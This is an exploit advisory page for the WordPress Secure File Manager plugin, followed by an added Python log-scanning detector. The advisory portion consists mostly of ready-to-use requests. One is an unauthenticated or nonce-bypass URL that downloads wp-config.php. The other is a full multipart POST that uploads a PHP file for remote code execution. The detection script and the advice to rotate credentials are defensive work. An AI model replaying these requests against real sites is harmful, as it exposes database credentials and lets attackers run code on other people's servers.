## https://sploitus.com/exploit?id=WPEX-ID:47C1639F-4558-4CB6-8F50-E5E8564663C2
Download the wp-config.php

< 2.6 - As an unauthenticated user, open /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&cpath=/wp-admin/admin.php

< 2.8.2 - Log in as any user and access the Secure File Manager menu (wp-admin/admin.php?page=sfm_file_manager), which will result in an Unauthorized Access error unless logged in as admin. View the source of the page and retrieve the value of the sfmpNonceKey, then append it to the URL above in a _wpnonce parameter:

/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&_wpnonce=69f62e1414&cpath=/wp-admin/admin.php


RCE can be obtained as well, with a crafted request that uploads a PHP file, e.g. /hello-user.php

For < 2.8.2, get the nonce with the same technique as above.
For < 2.6, just remove the _wpnonce parameter.

POST /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/admin.php?page=sfm_file_manager
Content-Type: multipart/form-data; boundary=---------------------------32138351926630035821198693946
Content-Length: 851
Origin: http://127.0.0.1
Connection: close
Cookie: [Subscriber cookie]

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="reqid"

1770034af3e3c9
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="cmd"

upload
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="_wpnonce"

69f62e1414
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="upload[]"; filename="hello-user.php"
Content-Type: text/plain

<?php echo 'failed'; ?>

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="mtime[]"

1375102826
-----------------------------32138351926630035821198693946--
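
For detection, the following is an added example (not part of the original advisory or the plugin's code) that scans web server access logs for requests to the connector path shown above and decodes the elFinder `target` value to show which file was requested. It assumes combined-format access logs, a hypothetical watch list of sensitive file names, and that a target hash is a volume prefix followed by unpadded URL-safe base64 of the path, which matches the two values on this page (`l1_d3AtY29uZmlnLnBocA` and `l1_Lw`).

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs

CONNECTOR = "/secure-file-manager/vendor/elfinder/php/connector.minimal.php"
SENSITIVE = ("wp-config.php", ".htaccess", ".env")  # assumed watch list
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def decode_target(target):
    """Decode an elFinder hash (volume prefix + URL-safe base64) to a path."""
    b64 = target.partition("_")[2].replace(".", "=")
    b64 += "=" * (-len(b64) % 4)  # restore stripped padding
    try:
        return base64.urlsafe_b64decode(b64).decode("utf-8", "replace")
    except ValueError:
        return None

def scan(lines):
    """Return one finding per request that reaches the connector directly."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, url, status = m.groups()
        parts = urlsplit(url)
        if not parts.path.endswith(CONNECTOR):
            continue
        q = parse_qs(parts.query)
        path = decode_target(q["target"][0]) if "target" in q else None
        if method == "POST":  # body is not logged, so cmd=upload cannot be seen
            reason = "POST to connector (possible upload)"
        elif q.get("cmd") == ["file"] and path and path.endswith(SENSITIVE):
            reason = "download of sensitive file"
        elif "_wpnonce" not in q:
            reason = "connector request without nonce"
        else:
            reason = "direct connector access"
        findings.append({"ip": ip, "status": int(status), "target": path, "reason": reason})
    return findings

SAMPLE = [  # constructed log lines, not taken from a real server
    '203.0.113.5 - - [10/Jan/2021:10:00:00 +0000] "GET /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&cpath=/wp-admin/admin.php HTTP/1.1" 200 3120 "-" "curl/7.68"',
    '203.0.113.5 - - [10/Jan/2021:10:01:00 +0000] "POST /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2021:10:02:00 +0000] "GET /wp-admin/admin.php?page=sfm_file_manager HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A 200 status on a flagged download, or a POST followed by requests for a new .php file in the site root, is worth treating as a compromise indicator and a reason to rotate the database credentials and salts stored in wp-config.php.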